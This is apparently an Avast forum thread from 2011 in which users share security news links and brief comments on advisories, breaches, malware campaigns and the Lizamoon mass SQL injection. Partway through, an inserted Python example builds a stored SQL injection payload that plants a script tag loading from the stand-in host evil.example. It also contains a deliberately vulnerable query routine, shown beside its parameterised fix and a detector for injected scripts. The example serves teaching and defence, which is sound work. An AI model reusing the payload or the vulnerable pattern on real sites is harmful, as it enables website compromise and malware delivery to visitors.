http://www.norman.com/security_center/blog/righard_zwienenberg/135191/en
-
New critical vulnerability in VLC Media Player
http://www.h-online.com/open/news/item/New-critical-vulnerability-in-VLC-Media-Player-1180905.html
VLC Media Player 1.1.7 addresses critical vulnerability
http://www.h-online.com/open/news/item/VLC-Media-Player-1-1-7-addresses-critical-vulnerability-1182203.html
-
Microsoft's security updates scheduled for release
Microsoft plans to release three updates for critical and nine updates for important vulnerabilities on 8 February 2011.
Microsoft Security Bulletin Advance Notification for February 2011
http://www.microsoft.com/technet/security/bulletin/ms11-feb.mspx
-
http://www.computerworld.com/s/article/9207940/Next_generation_banking_malware_emerges_after_Zeus?taxonomyId=17
http://krebsonsecurity.com/2011/02/revisiting-the-spyeyezeus-merger/
The rumored combination of two pieces of advanced online banking malware appears to be fully underway after several months of speculation.
What appears to be a beta version of a piece of malware that has bits of both Zeus and SpyEye is now in circulation, albeit among just a few people, said Aviv Raff, CTO and cofounder of Seculert.
The source code for Zeus was rumored to have been transferred to the creator of SpyEye, and it was anticipated that the two pieces of malware would be combined. That evidence has just emerged now, Raff said.
The new malware also has at least a couple of new features. One of those is designed to defeat Rapport, a browser add-on from the security vendor Trusteer that intends to protect connections between a client and a bank server and resist man-in-the-middle attacks. Previously, the anti-Rapport feature was a separate module for Zeus, but now it has been baked in, Raff said.
The malware writers have also added a way to remotely connect to a victim's computer using the Remote Desktop Protocol, a Microsoft protocol that allows a remote user to access a computer using the normal Windows graphical interface rather than a command line.
So far, Raff said it appears that only a few cybercriminals are using the new version. He declined to say how Seculert obtained the malware or how much it might be selling for on the malware market.
"It seems to be still under development, with bug fixes released almost daily," Raff said.
-
Hi ;)
I just read about the fake AV program FakeXPA which is very similar to AVG AV program.
https://threatpost.com/en_us/blogs/fake-avg-scam-software-cops-name-and-logo-real-av-020111
Can Avast detect this fake AV?
Thank you. Kind regards :)
-
Mailing list application Majordomo reveals file content
http://www.h-online.com/open/news/item/Mailing-list-application-Majordomo-reveals-file-content-1183034.html
-
Hackers Penetrate Nasdaq Computers
http://online.wsj.com/article/SB10001424052748704709304576124502351634690.html
-
2 years and still no fix for Java...
http://slightlyrandombrokenthoughts.blogspot.com/2011/02/java-jfilechooser-programmatic.html
-
ZDI names and shames security vulnerabilities from Microsoft, IBM, HP and Novell
http://www.h-online.com/security/news/item/ZDI-names-and-shames-security-vulnerabilities-from-Microsoft-IBM-HP-and-Novell-1185438.html
http://www.zerodayinitiative.com/advisories/published/
-
USB autorun attacks against Linux
http://blogs.iss.net/archive/Shmoocon2011.html
-
Critical updates for Adobe Reader and Acrobat
http://www.norman.com/security_center/security_center_archive/2011/135557/no
Critical vulnerability in Internet Explorer - no available update (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/133646/no
http://www.microsoft.com/technet/security/Bulletin/MS11-003.mspx
-
Oracle Security Alert for CVE-2010-4476
http://www.oracle.com/technetwork/topics/security/alert-cve-2010-4476-305811.html
Patch available: http://www.oracle.com/technetwork/java/javase/downloads/index.html#fpupdater
-
http://www.microsoft.com/technet/security/Bulletin/MS11-003.mspx
IE9 not affected after current Windows Update
From the FAQ: Is Internet Explorer 9 Beta affected by these vulnerabilities?
Internet Explorer 9 Beta is affected by the vulnerabilities described in this bulletin. Customers running this beta release are encouraged to download and apply the update to their systems. Security updates are available from Microsoft Update and Windows Update. The security updates for this beta are also available for download from the Microsoft Download Center.
-
Security vulnerability demonstrated in Safari
http://www.h-online.com/security/news/item/Security-vulnerability-demonstrated-in-Safari-1186873.html
-
Hardware keyloggers found in public libraries [UK]
http://www.h-online.com/security/news/item/Hardware-keyloggers-found-in-public-libraries-1190097.html
-
http://www.theregister.co.uk/2011/02/15/bbc_driveby_download/
Streaming sites operated by the BBC were hacked on Tuesday so they silently served visitors with malware, researchers from security firm Websense said.
An iframe tag on the BBC's 6 Music and 1Xtra websites injected an exploit that was housed on a website with an address ending in cc, a top level domain for the Cocos Islands. The malicious binary was generated by the Phoenix exploit kit, which dates back to 2007 and streamlines malware infections by collecting detailed statistics.
“If an unprotected user browsed to the site they would be faced with drive-by downloads, meaning that simply browsing to the page is enough to get infected with a malicious executable,” Websense researchers wrote in a blog post.
A VirusTotal scan showed that only nine of the top 43 antivirus products detected the threat.
http://www.virustotal.com/file-scan/report.html?id=4a0ab371e6c6dd54deeab41ab1b77fa373d2face149523dfd183d669b31da6bc-1297784293
-
Updated W32.Stuxnet Dossier is Available
http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf
-
Winamp Forums Security Notification
http://forums.winamp.com/showthread.php?t=327366
We have confirmed that your email address was exposed as a result of this attack. We have not confirmed but must assume that other Winamp Forums user account detail, including your forums username, date of birth, time zone preference and encrypted password (not your clear text or unencrypted password) was exposed. The Winamp Forums are now secure, but because we value your privacy we would like to notify you of the incident and encourage you to immediately change your password as a precautionary measure. If you have used your Winamp forums password across other web sites, please change the password on those web sites as well.
-
New hole in Windows file sharing
http://www.h-online.com/security/news/item/New-hole-in-Windows-file-sharing-1190923.html
Update:
Notes on exploitability of the recent Windows BROWSER protocol issue
http://blogs.technet.com/b/srd/archive/2011/02/16/notes-on-exploitability-of-the-recent-windows-browser-protocol-issue.aspx
My Sweet Valentine - the CIFS Browser Protocol Heap Corruption Vulnerability
http://blogs.technet.com/b/mmpc/archive/2011/02/16/my-sweet-valentine-the-cifs-browser-protocol-heap-corruption-vulnerability.aspx
-
Malware toolkits fuel the botnet epidemic
http://www.h-online.com/security/news/item/Malware-toolkits-fuel-the-botnet-epidemic-1191981.html
http://www.damballa.com/downloads/r_pubs/Damballa_2010_Top_10_Botnets_Report.pdf
-
Foreign hackers attack Canadian government
http://www.cbc.ca/politics/story/2011/02/16/pol-weston-hacking.html
-
http://www.theregister.co.uk/2011/02/15/bbc_driveby_download/
Streaming sites operated by the BBC were hacked on Tuesday so they silently served visitors with malware, researchers from security firm Websense said.
An iframe tag on the BBC's 6 Music and 1Xtra websites injected an exploit that was housed on a website with an address ending in cc, a top level domain for the Cocos Islands. The malicious binary was generated by the Phoenix exploit kit, which dates back to 2007 and streamlines malware infections by collecting detailed statistics.
If an unprotected user browsed to the site they would be faced with drive-by downloads, meaning that simply browsing to the page is enough to get infected with a malicious executable, Websense researchers wrote in a blog post.
A VirusTotal scan showed that only nine of the top 43 antivirus products detected the threat.
http://www.virustotal.com/file-scan/report.html?id=4a0ab371e6c6dd54deeab41ab1b77fa373d2face149523dfd183d669b31da6bc-1297784293
Interesting, yesterday's refresh claims that Avast! still fails to identify this threat.
-
Just took that script and put it in a text file, and scanned it with avast. The iframe was detected.
-
Social Network Security Portal
http://www.socialnetworksecurity.org/en/index.php
-
Social Network Security Portal
http://www.socialnetworksecurity.org/en/index.php
404 Not Found (http://www.socialnetworksecurity.org/en/index.php)
-
Social Network Security Portal
http://www.socialnetworksecurity.org/en/index.php
404 Not Found (http://www.socialnetworksecurity.org/en/index.php)
No problem for me.
-
Thank you, YoKenny. I get the same results in IE8 even after flushing the Windows XP DNS cache. Google DNS (8.8.8.8) returns an IP of 174.122.92.18 for www.socialnetworksecurity.org. When I enter the IP in IE8 I still get the 404. Could you enter nslookup www.socialnetworksecurity.org in a command window and tell me your result? I'd like to know the IP of your server and the IP it returns for the problematic website.
Edit: The Level 3 name server at 4.2.2.1 is returning 174.122.92.41, which at least takes me to the socialnetworksecurity.org German language page.
-
Could you enter nslookup www.socialnetworksecurity.org in a command window and tell me your result? I'd like to know the IP of your server and the IP it returns for the problematic website.
Response from nslookup:
C:\>nslookup www.socialnetworksecurity.org
Server: resolver1-fs.opendns.com
Address: 208.67.222.123
Non-authoritative answer:
Name: www.socialnetworksecurity.org.2wire.net
Address: 67.215.65.132
-
Thanks. Entering http://174.122.92.41/en/index.php in the url bar gets me to the socialnetworksecurity.org English language page.
-
Flash Drives Dangerously Hard to Purge of Sensitive Data:
http://www.theregister.co.uk/2011/02/21/flash_drive_erasing_peril/
-
Microsoft Security Advisory (2491888)
Vulnerability in Microsoft Malware Protection Engine Could Allow Elevation of Privilege
http://www.microsoft.com/technet/security/advisory/2491888.mspx
-
Microsoft Security Advisory (2491888)
Vulnerability in Microsoft Malware Protection Engine Could Allow Elevation of Privilege
http://www.microsoft.com/technet/security/advisory/2491888.mspx
Key statement: When this security advisory was issued, had Microsoft received any reports that this vulnerability was being exploited?
No. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security advisory was originally issued.
-
20 years of innovative Windows malware
http://infoworld.com/d/security/20-years-innovative-windows-malware-021
-
Trojan targets Mac OS X
http://nakedsecurity.sophos.com/2011/02/26/mac-os-x-backdoor-trojan-now-in-beta/
-
***
Man sentenced to jail for eBay fraud
A man who used the website eBay to dishonestly obtain nearly $40,000 has been sentenced to three years in jail by a Brisbane District Court Judge.
Philip John Heggie, 19, today pleaded guilty to 20 charges, including fraud and computer hacking, and another 91 charges of breaching bail conditions.
http://www.abc.net.au/news/stories/2011/03/01/3151995.htm?site=brisbane&section=news&date=(none)
***
-
Britons caught out by bad web ads
http://www.bbc.co.uk/news/technology-12608651
I have seen the extent of this on another forum, with an increased number of system tool infections...
-
LastPass security hole (cross site scripting)
http://forum.avast.com/index.php?topic=72774.msg606137#msg606137
-
The anti-social network: boys jailed for $26m 'Crimebook' scam
http://www.smh.com.au/technology/technology-news/the-antisocial-network-boys-jailed-for-26m--crimebook--scam-20110303-1bfxw.html
-
Rogue AV pimps finally show love for alternative browsers...Ruse spoofs Firefox, Chrome, Safari
http://www.theregister.co.uk/2011/03/02/rogue_av_mimics_firefox/
(http://regmedia.co.uk/2011/03/02/fake_av_firefox.png)
-
It never ceases to amaze me how many people will actually fall for this and click the Start Protection, etc. etc.
Basically they don't know what their browser can and can't do.
-
Is avast! warning us about this ???
-
Well the problem is the initial is just a pop-up/ad, the main payload comes from clicking the Start Protection. Then would we see if it is blocked/detected.
-
WordPress.com Suffers Largest DDoS Attack In Its History
http://techcrunch.com/2011/03/03/wordpress-com-suffers-major-ddos-attack/
-
WordPress.com Suffers Largest DDoS Attack In Its History
http://techcrunch.com/2011/03/03/wordpress-com-suffers-major-ddos-attack/
WordPress.com Survives DDOS Attack
http://blog.eset.com/2011/03/03/wordpress-com-survives-ddos-attack
-
A Look Inside the Bustling Cybercrime Marketplace
http://www.securityweek.com/look-inside-bustling-cybercrime-marketplace
-
i'm not really sure if this would count as a legitimate security warning, but i'll mention it anyways. hopefully it will show notice in some way. when i got rid of this one file called either "LHU.exe" or "IHU.exe",... it was called something like that. it masked itself as something called "xp anti-virus 2011". while it activated ever so often, i had the new software update to 6.01 and avast then did not detect its actions as malicious/suspicious. i can't figure out where i picked it up at, though, i did some fancy regedit moves and did one last scan in safe mode with avast (new software update @ 6.01) and that PUP got placed in custody (virus chest). i submitted that plus 7 other files to the avast virus lab for analysis, hopefully i could receive some word on if my findings were useful to this forum or not through that process.
fancy regedit moves:
1. http://www.expertsupportnow.com/870/how-to-remove-xp-anti-virus-2011-virus-malware/
just in case anything goes wrong with your ability to launch *.exe files if you misstep
on regedit fixing, use the below link to fix it.
2. http://filext.com/faq/broken_exe_association.php
-
***
French government comes under cyber attack
The French finance ministry has shut down 10,000 computers after a "spectacular" cyber attack from hackers using Internet addresses in China, officials and reports said Monday.
The rest of the story is at the link below.
http://news.id.msn.com/top-stories/article.aspx?cp-documentid=4694193
***
-
WordPress.com Suffers Largest DDoS Attack In Its History
http://techcrunch.com/2011/03/03/wordpress-com-suffers-major-ddos-attack/
WordPress.com Survives DDOS Attack
http://blog.eset.com/2011/03/03/wordpress-com-survives-ddos-attack
WordPress hit with second big attack in two days
http://news.cnet.com/8301-27080_3-20039385-245.html
WordPress.com DDoS Attacks Primarily From China
http://techcrunch.com/2011/03/04/wordpress/
-
Plaintext injection in STARTTLS
http://www.securityfocus.com/archive/1/516901/30/0/threaded
http://www.kb.cert.org/vuls/id/555316
-
USB driver bug exposed as "Linux plug&pwn"
http://www.h-online.com/open/news/item/USB-driver-bug-exposed-as-Linux-plug-pwn-1203617.html
-
***
Q4 Malware Update: Significant Rise in Malvertising Attacks, Social Networking Sites Easy Distribution Platforms for Malware
THE Q4 HIGHLIGHTS WERE:
* Malvertising is on a significant rise, having doubled from Q3 to Q4 2010.
* More than one million web sites were estimated to be infected in Q4 2010.
* The probability that an average Internet user will hit an infected page after three months of web browsing is 95%.
* The top attacker domain was ipq.com, a free DNS forwarding service.
* Most social media networks are prone to being used as distribution platforms for malware.
The rest of the story is at the link below:
http://blog.dasient.com/2011/03/dasient-q4-malware-update-significant.html
***
-
Apple releases Java security updates
http://www.h-online.com/security/news/item/Apple-releases-Java-security-updates-1204690.html
-
Anonymous now attacks the US music industry
http://www.h-online.com/security/news/item/Anonymous-now-attacks-the-US-music-industry-1205391.html
-
Anonymous now attacks the US music industry
http://www.h-online.com/security/news/item/Anonymous-now-attacks-the-US-music-industry-1205391.html
Their methods may not be acceptable, but I don't know if their message is totally off track.
I haven't always agreed with the methods used by the RIAA either. ;D
-
MHTML vulnerability under active exploitation
http://googleonlinesecurity.blogspot.com/2011/03/mhtml-vulnerability-under-active.html
-
Photobucket Spoofing email scam. (http://blog.photobucket.com/blog/2011/03/spoofing-email-scam-notification.html)
-
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-01.html
-
not a warning against anything in particular but a good move from Twitter:
http://blog.twitter.com/2011/03/making-twitter-more-secure-https.html
this was already possible manually, now this can be permanently set on your account (if you have one), just like Google does it with Gmail.
-
Click-jacking is spreading on Facebook
http://www.h-online.com/security/news/item/Click-jacking-is-spreading-on-Facebook-1207312.html
-
Click-jacking is spreading on Facebook
http://www.h-online.com/security/news/item/Click-jacking-is-spreading-on-Facebook-1207312.html
They mentioned IE7 as the browser that made this work. Wonder if IE9 is also susceptible and how about Chrome ???
-
Click-jacking is spreading on Facebook
http://www.h-online.com/security/news/item/Click-jacking-is-spreading-on-Facebook-1207312.html
They mentioned IE7 as the browser that made this work. Wonder if IE9 is also susceptible and how about Chrome ???
Don't know about IE9, but Chrome seems to be ok.
While the trick worked smoothly in Internet Explorer 7 under Windows XP, clicking in Firefox or Chrome did not result in a Facebook status post.
-
CanSecWest: game consoles spread viruses within LANs
http://www.h-online.com/security/news/item/CanSecWest-game-consoles-spread-viruses-within-LANs-1209069.html
-
"Phishers Have No Mercy for Japan"
http://www.symantec.com/connect/blogs/phishers-have-no-mercy-japan
-
And more Japan scam
Not surprisingly - nevertheless disgusting - the recent events in Japan have inspired shameless exploitations by cybercriminals.
http://www.norman.com/security_center/security_center_archive/2011/shamelessly_exploiting_disasters/no
-
"Privacy group demands answers from Skype"
http://www.theregister.co.uk/2011/03/16/skype_security_holes/
-
Phishing Scam in an HTML Attachment
http://labs.m86security.com/2011/03/phishing-scam-in-an-html-attachment/
-
I know this is very old (2004), but I just found it and this is so funny ;D
Passwords revealed by sweet deal
More than 70% of people would reveal their computer password in exchange for a bar of chocolate, a survey has found.
http://news.bbc.co.uk/2/hi/technology/3639679.stm
-
RSA hack could endanger the security of SecurID tokens
http://www.h-online.com/security/news/item/RSA-hack-could-endanger-the-security-of-SecurID-tokens-1210393.html
http://forum.avast.com/index.php?topic=74077.0
-
RSA hack could endanger the security of SecurID tokens
http://www.h-online.com/security/news/item/RSA-hack-could-endanger-the-security-of-SecurID-tokens-1210393.html
http://forum.avast.com/index.php?topic=74077.0
http://forum.avast.com/index.php?topic=74077.msg614434#msg614434
-
Hmmm...??? I already linked to your thread. ;)
asyn
-
PHP developer wiki server hacked
http://www.h-online.com/open/news/item/PHP-developer-wiki-server-hacked-1211874.html
-
I wonder who is the first to make an AV for cars :o
With hacking, music can take control of your car
http://www.itworld.com/security/139794/with-hacking-music-can-take-control-your-car
-
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-01.html
Security updates available for Adobe Reader and Acrobat
http://www.adobe.com/support/security/bulletins/apsb11-06.html
Edit: For Flash Player see here: http://forum.avast.com/index.php?topic=9671.msg616370#msg616370
-
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-01.html
Security updates available for Adobe Reader and Acrobat
http://www.adobe.com/support/security/bulletins/apsb11-06.html
Edit: For Flash Player see here: http://forum.avast.com/index.php?topic=9671.msg616370#msg616370
OT: You're better off not installing Adobe Reader because of security holes every time you update the patch, and you'll be a lot safer using PDF-XChange Viewer or something better that has less problems and yes you still have to update the Flash Player.
-
OT: You're better off not installing Adobe Reader because of security holes every time you update the patch, and you'll be a lot safer using PDF-XChange Viewer or something better that has less problems and yes you still have to update the Flash Player.
You're right, that's OT, but much more important: it's true.!! :)
I also use PDF-XChange Viewer... ;)
asyn
-
yeah I was wondering, couldn't find the Adobe Reader 10.0.2 update for Windows, just for Mac... it's really not clear at all ::)
Adobe recommends users of Adobe Acrobat X (10.0.1) for Windows and Macintosh update to Adobe Acrobat X (10.0.2)
Because Adobe Reader X Protected Mode would prevent an exploit of this kind from executing, we are planning to address this issue in Adobe Reader X for Windows with the next quarterly security update for Adobe Reader, currently scheduled for June 14, 2011.
... wondering what they've been smoking lately @Adobe ::)
and then this thread here:
http://forums.adobe.com/thread/825916
-
Security flaw in RealPlayer
http://www.h-online.com/security/news/item/Security-flaw-in-RealPlayer-1213044.html
-
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-01.html
Wow, their patch policy rocks... ::)
Because Adobe Reader X Protected Mode would prevent an exploit of this kind from executing, we are planning to address this issue in Adobe Reader X for Windows with the next quarterly security update for Adobe Reader, currently scheduled for June 14, 2011
For those who still have not abandoned the junk: PDF-XChange Viewer (http://www.tracker-software.com/product/pdf-xchange-viewer) (available also in native 64bit variant) or Foxit Reader (http://www.foxitsoftware.com/pdf/reader/addons.php/) (if you are after something fast and small).
-
666.624 IPv4 addresses sold for $7.5M to Microsoft
http://www.norman.com/security_center/blog/righard_zwienenberg/144541/en-us
-
Google Picasa Insecure Library Loading Vulnerability
http://secunia.com/advisories/43853/
Solution
Update to version 3.8.
-
Google Picasa Insecure Library Loading Vulnerability
http://secunia.com/advisories/43853/
Solution
Update to version 3.8.
Already up to date.
-
Spotify ads hit by malware attack
http://www.bbc.co.uk/news/technology-12891182
Also links to avast and websense blogs on the subject in the article
-
Spotify ads hit by malware attack
http://www.bbc.co.uk/news/technology-12891182
Also links to avast and websense blogs on the subject in the article
Also on avast! blog:
Malware stops the music at Spotify.com
https://blog.avast.com/2011/03/28/malware-stops-the-music-at-spotify-com
-
When buffer overflows in printers become a risk
http://www.h-online.com/security/news/item/When-buffer-overflows-in-printers-become-a-risk-1217292.html
-
VMware Security Advisory - VMware vmrun utility local privilege escalation
https://www.vmware.com/security/advisories/VMSA-2011-0006.html
-
Is Samsung Installing Keyloggers on New Laptops ???
You be the judge! (http://chris.pirillo.com/is-samsung-installing-keyloggers-on-new-laptops/)
-
Is Samsung Installing Keyloggers on New Laptops ???
You be the judge! (http://chris.pirillo.com/is-samsung-installing-keyloggers-on-new-laptops/)
http://forum.avast.com/index.php?topic=75041.msg621801#msg621801
-
Is Samsung Installing Keyloggers on New Laptops ???
You be the judge! (http://chris.pirillo.com/is-samsung-installing-keyloggers-on-new-laptops/)
yep... I went too fast yesterday when referring to the fact that CNet didn't find the keylogger, and the statement about a Vipre FP ... don't know what I was thinking of ::) forgot that indeed Samsung themselves, at least a rep, admitted that they indeed installed that crap on laptops.
-
Is Samsung Installing Keyloggers on New Laptops ???
You be the judge! (http://chris.pirillo.com/is-samsung-installing-keyloggers-on-new-laptops/)
http://forum.avast.com/index.php?topic=75041.msg621801#msg621801
Asyn that doesn't make sense, Samsung acknowledged the presence of the keylogger.
-
Asyn that doesn't make sense, Samsung acknowledged the presence of the keylogger.
http://www.samsungtomorrow.com/1071
-
Asyn that doesn't make sense, Samsung acknowledged the presence of the keylogger.
http://www.samsungtomorrow.com/1071
again, a samsung rep acknowledged the existence of the keylogger before anyone there mentioned a Vipre FP.
-
again, a samsung rep acknowledged the existence of the keylogger before anyone there mentioned a Vipre FP.
We should discuss this in the other thread, if needed. ;)
-
http://www.theinquirer.net/inquirer/news/2039497/thousands-websites-infected-sql-injection-attack
Thousands of websites infected by SQL injection attack
Around 1.5 million URLs infected
AN SQL INJECTION ATTACK campaign is spreading like wildfire, with 28,000 URLs that were initially reported to have infected code increasing to around 1.5 million within about four days.
In its latest update, Websense said that 1.5 million URLs have the same structure as the original attack. Although the figures only count URLs rather than individual domains or websites, the number of websites that have been compromised is likely to be in the thousands by now.
The first domain that Websense saw infected with bad code on 29 March was called Lizamoon.com. From there the infected script spreads to other websites through SQL injection, a technique that exploits insecure code through the database backend of a website... (more)
More here
http://www.theregister.co.uk/2011/03/31/lizamoon_mass_injection_attack/
-
Thousands of websites infected by SQL injection attack
No idea which browser you're using...
But, if you use FF, add NoScript - problem solved..! :)
asyn
-
Dissecting the Massive SQL Injection Attack Serving Scareware
Wonderful stuff by Dancho. Must read
http://ddanchev.blogspot.com/2011/03/dissecting-massive-sql-injection-attack.html
-
Thousands of websites infected by SQL injection attack
No idea, which browser you're using...
But, if you use FF, add NoScript - problem solved..! :)
asyn
The SQL injection has nothing to do with your browser as the injection is into the page source code. We have seen several instances of the lizamoon . com injected scripts being blocked by the Web Shield as win32:Script-inf detection.
Whilst NoScript should stop the script being run (so should NotScript for Chrome), unless you have very lax NoScript settings, it isn't guaranteed.
So for now be thankful that the web shield is your protector in these injected scripts.
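The two points made above, that the Lizamoon campaign gets its script tags into pages through SQL injection on the server side, and that a browser add-on like NoScript only affects whether the injected tag runs and does nothing about the injection itself, can be shown in a few lines. This is an added example and not code from the forum or from any of the linked articles: a visit-logging routine that splices request data into SQL beside its parameterised replacement, and a database-side check that lists stored pages loading a script from a host the site does not own. The table layout, the payload, and the host names evil.example and www.example.com are constructed for the demonstration; ur.php is the file name mentioned in the Websense write-up.

```python
"""
Stored SQL injection of the kind described in the Lizamoon reports, beside the
fix and a database-side check. Added example, not code from the forum or from
any article linked here. Table layout, the payload and the host names
(evil.example, www.example.com) are constructed for the demonstration.
"""
import re
import sqlite3
from urllib.parse import urlsplit

# Assumption: the site only serves its own scripts from this host.
TRUSTED_SCRIPT_HOSTS = {"www.example.com"}

# Regex picking the src attribute out of <script ...> tags in stored HTML.
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.I)

# Constructed payload: closes the open quote, appends an UPDATE that tacks a
# script tag onto every stored page, then comments out the rest of the statement.
PAYLOAD = ("x'); UPDATE pages SET body = body || "
           "'<script src=\"http://evil.example/ur.php\"></script>'; --")


def make_db():
    """In-memory site database: two content pages and a visit log."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, slug TEXT, body TEXT)")
    con.executemany(
        "INSERT INTO pages (slug, body) VALUES (?, ?)",
        [("home", "<p>Welcome</p>"), ("about", "<p>About us</p>")],
    )
    con.execute("CREATE TABLE visits (slug TEXT, referer TEXT)")
    con.commit()
    return con


def log_visit_vulnerable(con, slug, referer):
    """BAD: request data is spliced into the SQL text. executescript() models a
    database API that accepts stacked statements, which is what lets one
    injected value rewrite unrelated tables."""
    con.executescript(
        f"INSERT INTO visits (slug, referer) VALUES ('{slug}', '{referer}');"
    )


def log_visit_safe(con, slug, referer):
    """GOOD: placeholders. The values travel separately from the statement, so
    the payload is stored verbatim as data and never parsed as SQL."""
    con.execute("INSERT INTO visits (slug, referer) VALUES (?, ?)", (slug, referer))
    con.commit()


def find_injected_scripts(con, trusted_hosts=TRUSTED_SCRIPT_HOSTS):
    """Database-side check: list (slug, src) for every stored page that loads a
    script from a host outside the trusted set. This is what a mass injection
    looks like from the server, whatever the visitor's browser does with it."""
    hits = []
    for slug, body in con.execute("SELECT slug, body FROM pages ORDER BY id"):
        for src in SCRIPT_SRC.findall(body):
            host = (urlsplit(src).hostname or "").lower()
            if host not in trusted_hosts:
                hits.append((slug, src))
    return hits


def run(handler):
    """Run one visit-logging implementation against the payload and report
    what ended up in the database."""
    con = make_db()
    handler(con, "home", PAYLOAD)
    return {
        "visits": con.execute("SELECT referer FROM visits").fetchall(),
        "injected": find_injected_scripts(con),
    }


if __name__ == "__main__":
    for name, handler in (("vulnerable", log_visit_vulnerable), ("safe", log_visit_safe)):
        result = run(handler)
        print(f"{name}: {len(result['injected'])} page(s) carry a foreign script tag")
```

With the vulnerable routine every page in the table ends up carrying the foreign script tag; with the parameterised one the whole payload is stored as a harmless string in the visit log and the pages are untouched. The check over the pages table is the kind of thing a site owner can run on a schedule, since it works on what is actually stored rather than on what a particular browser chooses to execute.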
-
1. Whilst NoScript should stop the script being run ... so it isn't guaranteed.
2. So for now be thankful that the web shield is your protector in these injected scripts.
1. It is. ;)
2. I/we am/are. :)
-
Interesting, this ur.php file also featured in another thread.
http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx
Thread is here: http://forum.avast.com/index.php?topic=75016.msg621057#msg621057
-
I just received this:
"Kroger wants you to know that the data base with our customers' names and email addresses has been breached by someone outside of the company. This data base contains the names and email addresses of customers who voluntarily provided their names and email addresses to Kroger. We want to assure you that the only information that was obtained was your name and email address. As a result, it is possible you may receive some spam email messages. We apologize for any inconvenience."
So if you shop at Kroger or Smith's and supplied them with your email address,
expect an increase in your spam and not the kind you eat either.
I wanted to ask them if they'll give us a discount on Spam the next time we do our shopping.... ;D
-
RSA hack could endanger the security of SecurID tokens
http://www.h-online.com/security/news/item/RSA-hack-could-endanger-the-security-of-SecurID-tokens-1210393.html
http://forum.avast.com/index.php?topic=74077.0
Anatomy of an Attack
http://blogs.rsa.com/rivner/anatomy-of-an-attack/
-
I just received this:
"Kroger wants you to know that the data base with our customers' names and email addresses has been breached by someone outside of the company. This data base contains the names and email addresses of customers who voluntarily provided their names and email addresses to Kroger. We want to assure you that the only information that was obtained was your name and email address. As a result, it is possible you may receive some spam email messages. We apologize for any inconvenience."
So if you shop at Kroger or Smith's and supplied them with your email address,
expect an increase in your spam and not the kind you eat either.
Millions of email addresses exposed in Epsilon breach
http://www.h-online.com/security/news/item/Millions-of-email-addresses-exposed-in-Epsilon-breach-1221307.html
-
Millions of email addresses exposed in Epsilon breach
http://www.h-online.com/security/news/item/Millions-of-email-addresses-exposed-in-Epsilon-breach-1221307.html
It gets worse by the day:
Epsilon Security Breach Spreads:
https://threatpost.com/en_us/blogs/epsilon-data-breach-expands-include-capital-one-disney-others-040411
http://threatpost.com/en_us/blogs/list-companies-hit-epsilon-breach-040511
Update to those affected by this breach: To those living within the US, the phone number to call Epsilon for additional information regarding this breach is 1-866-595-4896. However, Epsilon is a global company. I contacted them and was told that hackers gained information from Epsilon, however the only information they gained were email addresses. The concern is that the hackers are now sending out email to the emails they obtained with malicious codes (they would not offer when pressed what malware is involved or where the hackers originated from as they "could not disclose that information" to me), and Epsilon is advising users when you contact them to not open up emails you do not recognize and to keep your antivirus and firewall up to date. Epsilon refuses to disclose additional information and will not offer free ID Theft to users who were affected as of contacting them 4/05/11.
-
Millions of email addresses exposed in Epsilon breach
http://www.h-online.com/security/news/item/Millions-of-email-addresses-exposed-in-Epsilon-breach-1221307.html
It gets worse by the day:
Epsilon Security Breach Spreads:
https://threatpost.com/en_us/blogs/epsilon-data-breach-expands-include-capital-one-disney-others-040411
http://threatpost.com/en_us/blogs/list-companies-hit-epsilon-breach-040511
Additional info here: http://krebsonsecurity.com/2011/04/epsilon-breach-raises-specter-of-spear-phishing/
-
and more about Epsilon here
To the Millions and Millions of people
How not to warn the Millions!
http://norman.com/security_center/blog/righard_zwienenberg/144731/en-us
-
Google Chrome to warn of malicious Windows executables
http://www.theregister.co.uk/2011/04/05/google_malicious_executables_warning/
-
and more about Epsilon here
To the Millions and Millions of people… How not to warn the Millions!
http://norman.com/security_center/blog/righard_zwienenberg/144731/en-us
A list of the companies who used Epsilon Services:
http://www.databreaches.net/?p=17374
-
LiveJournal under attack
DDoS attack - Optima/Darkness DDoS bot
http://www.securelist.com/en/blog/442/LiveJournal_under_attack
-
Monthly Malware Statistics, March 2011
http://www.securelist.com/en/analysis/204792170/Monthly_Malware_Statistics_March_2011
A new chinese bootkit http://www.securelist.com/en/blog/434/The_Chinese_bootkit
-
DHCP client allows shell command injection
http://www.h-online.com/security/news/item/DHCP-client-allows-shell-command-injection-1222805.html
-
The PlayStation 3 controversy - Anonymous enters the scene
http://www.norman.com/security_center/security_center_archive/2011/playstation_3_controversy_anonymous_enters_the_scene/en-us
-
"Successful" Twitter malware proves it once more
http://www.norman.com/security_center/blog/per_olav_forland/144829/en-us
-
The PlayStation 3 controversy - Anonymous enters the scene
http://www.norman.com/security_center/security_center_archive/2011/playstation_3_controversy_anonymous_enters_the_scene/en-us
http://anonnews.org/?p=press&a=item&i=797
-
Malware baddies crank up Trojan production
http://www.theregister.co.uk/2011/04/06/malware_trends/
During the first three months of 2011 an average of 73,000 new strains of malware have been created every day: 10,000 more than during the same period last year, according to stats from Panda Security. Around 70 per cent of these malware strains were Trojans, with viruses making up 17 per cent of the sample, the second most common category.
Google Chrome to warn of malicious Windows executables
http://www.theregister.co.uk/2011/04/05/google_malicious_executables_warning/
Google says it's expanding its blacklist of malicious websites to include those that use deceptive claims to push harmful Windows programs.
-
Lots of flags on Hotmail / Windows Live site today. I'm not alone.
-
Lots of flags on Hotmail / Windows Live site today. I'm not alone.
It was FP and has been solved meanwhile...!!! ;)
http://forum.avast.com/index.php?topic=75653.0
Doesn't really fit here, btw.
asyn
-
Microsoft Security Bulletin Advance Notification for April 2011
